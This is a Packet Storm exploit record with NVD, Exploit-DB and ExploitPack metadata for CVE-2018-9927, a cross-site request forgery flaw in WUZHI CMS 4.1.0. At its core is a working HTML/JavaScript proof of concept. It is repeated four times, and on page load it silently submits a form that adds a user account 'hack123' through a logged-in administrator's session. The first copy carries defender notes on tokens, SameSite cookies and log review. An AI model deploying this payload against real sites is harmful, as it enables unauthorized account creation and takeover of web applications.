ID PACKETSTORM:147141
Type packetstorm
Reporter taoge
Modified 2018-04-11T00:00:00
Description
`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/128).
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
The request is issued when an administrator who is already logged in opens the CSRF proof-of-concept page below.
<html><body>
<script type="text/javascript">
// Builds a <form> from caller-supplied markup and submits it as a POST to `url`.
//   url    - value assigned to the form's action attribute
//   fields - HTML string assigned to innerHTML; its <input> elements become the POST body
// Nothing in this helper adds an anti-CSRF token or any other per-session secret.
// The advisory reports that the target endpoint accepts such a request (CSRF, CVE-2018-9927).
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self"; // the response loads in the current browsing context, not a new window
p.method = "post";
document.body.appendChild(p); // the form is attached to the document before submit() is called
p.submit();
}
// Proof of concept for the CSRF issue described above (CVE-2018-9927): assembles
// the hidden fields of the "add user account" form and hands them to post().
// The field values are the author's samples, and the URL points at a local test
// instance (127.0.0.1).
//
// Defender notes: per the advisory, the request depends on an administrator
// already being logged in. The usual remedies for this class of bug are a
// per-session anti-CSRF token validated by the v=add handler, SameSite session
// cookies, and an Origin/Referer check on state-changing requests. For triage,
// review web logs for POSTs to index.php?m=member&f=index&v=add whose
// Origin/Referer is not the CMS itself, and audit the member list for accounts
// nobody on the team created.
function csrf_hack()
{
var fields; // declared without a value, so the first += prepends the text "undefined" to the markup
// Account credentials and contact fields of the new member.
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
// Group assignment; what group id 3 denotes in the CMS is not shown on this page.
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
// Remaining profile fields, left empty or at 0.
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
// m=member&f=index&v=add is the route named in the advisory; no token or other
// unpredictable value appears among the fields or the query parameters.
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
// Runs csrf_hack() from the load handler, so the POST is sent as soon as the page
// finishes loading; the code waits for no click or other input on the page.
window.onload = function() { csrf_hack();}
</script>
</body></html>
`
{"id": "PACKETSTORM:147141", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery", "description": "", "published": "2018-04-11T00:00:00", "modified": "2018-04-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/147141/Wuzhi-CMS-4.1.0-Add-User-Cross-Site-Request-Forgery.html", "reporter": "taoge", "references": [], "cvelist": ["CVE-2018-9927"], "lastseen": "2018-04-12T01:03:53", "viewCount": 6, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2018-04-12T01:03:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-9927"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9020CC101457E38D768545DF8C15301E"]}, {"type": "exploitdb", "idList": ["EDB-ID:44440"]}], "modified": "2018-04-12T01:03:53", "rev": 2}, "vulnersScore": 5.6}, "sourceHref": "https://packetstormsecurity.com/files/download/147141/wuzhicms410adduser-xsrf.txt", "sourceData": "`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account \n# Date: 2018-04-10 \n# Exploit Author: taoge \n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms \n# Software Link: https://github.com/wuzhicms/wuzhicms \n# Version: 4.1.0 \n# CVE : CVE-2018-9927 \n \nAn issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4 \nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add. \nAfter the administrator logged in, open the csrf exp page. 
\n \n \n<html><body> \n<script type=\"text/javascript\"> \nfunction post(url,fields) \n{ \nvar p = document.createElement(\"form\"); \np.action = url; \np.innerHTML = fields; \np.target = \"_self\"; \np.method = \"post\"; \ndocument.body.appendChild(p); \np.submit(); \n} \nfunction csrf_hack() \n{ \nvar fields; \n \n \nfields += \"<input type='hidden' name='info[username]' value='hack123' />\"; \nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='avatar' value='' />\"; \nfields += \"<input type='hidden' name='islock' value='0' />\"; \nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \n \n \nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\"; \npost(url,fields); \n} \nwindow.onload = function() { csrf_hack();} \n</script> \n</body></html> \n \n \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:52:44", "description": "An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-10T06:29:00", "title": "CVE-2018-9927", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9927"], "modified": "2019-02-27T20:03:00", "cpe": ["cpe:/a:wuzhicms:wuzhicms:4.1.0"], "id": "CVE-2018-9927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9927", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2018-05-24T14:13:57", "description": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User). 
Webapps exploit for PHP platform", "published": "2018-04-10T00:00:00", "type": "exploitdb", "title": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9927"], "modified": "2018-04-10T00:00:00", "id": "EDB-ID:44440", "href": "https://www.exploit-db.com/exploits/44440/", "sourceData": "# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account\r\n# Date: 2018-04-10\r\n# Exploit Author: taoge\r\n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms\r\n# Software Link: https://github.com/wuzhicms/wuzhicms\r\n# Version: 4.1.0 \r\n# CVE : CVE-2018-9927\r\n \r\nAn issue was discovered in WUZHI CMS 4.1.0.\uff08https://github.com/wuzhicms/wuzhicms/issues/128\uff09\r\nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.\r\nAfter the administrator logged in, open the csrf exp page.\r\n \r\n \r\n<html><body>\r\n<script type=\"text/javascript\">\r\nfunction post(url,fields)\r\n{\r\nvar p = document.createElement(\"form\");\r\np.action = url;\r\np.innerHTML = fields;\r\np.target = \"_self\";\r\np.method = \"post\";\r\ndocument.body.appendChild(p);\r\np.submit();\r\n}\r\nfunction csrf_hack()\r\n{\r\nvar fields;\r\n\r\n\r\nfields += \"<input type='hidden' name='info[username]' value='hack123' />\";\r\nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \r\nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \r\nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \r\nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \r\nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \r\nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields 
+= \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='avatar' value='' />\"; \r\nfields += \"<input type='hidden' name='islock' value='0' />\"; \r\nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \r\nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \r\nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \r\nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \r\nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \r\n\r\n\r\nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\";\r\npost(url,fields);\r\n}\r\nwindow.onload = function() { csrf_hack();}\r\n</script>\r\n</body></html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44440/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:54", "description": "\nWUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "edition": 1, "published": "2018-04-10T00:00:00", "title": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9927"], "modified": "2018-04-10T00:00:00", "id": "EXPLOITPACK:9020CC101457E38D768545DF8C15301E", "href": "", "sourceData": "# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account\n# Date: 2018-04-10\n# Exploit Author: taoge\n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms\n# Software Link: https://github.com/wuzhicms/wuzhicms\n# Version: 4.1.0 \n# CVE : CVE-2018-9927\n \nAn issue was discovered in WUZHI CMS 4.1.0.\uff08https://github.com/wuzhicms/wuzhicms/issues/128\uff09\nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.\nAfter the administrator logged in, open the csrf exp page.\n \n \n<html><body>\n<script type=\"text/javascript\">\nfunction 
post(url,fields)\n{\nvar p = document.createElement(\"form\");\np.action = url;\np.innerHTML = fields;\np.target = \"_self\";\np.method = \"post\";\ndocument.body.appendChild(p);\np.submit();\n}\nfunction csrf_hack()\n{\nvar fields;\n\n\nfields += \"<input type='hidden' name='info[username]' value='hack123' />\";\nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='avatar' value='' />\"; \nfields += \"<input type='hidden' name='islock' value='0' />\"; \nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \n\n\nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\";\npost(url,fields);\n}\nwindow.onload = function() { csrf_hack();}\n</script>\n</body></html>", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}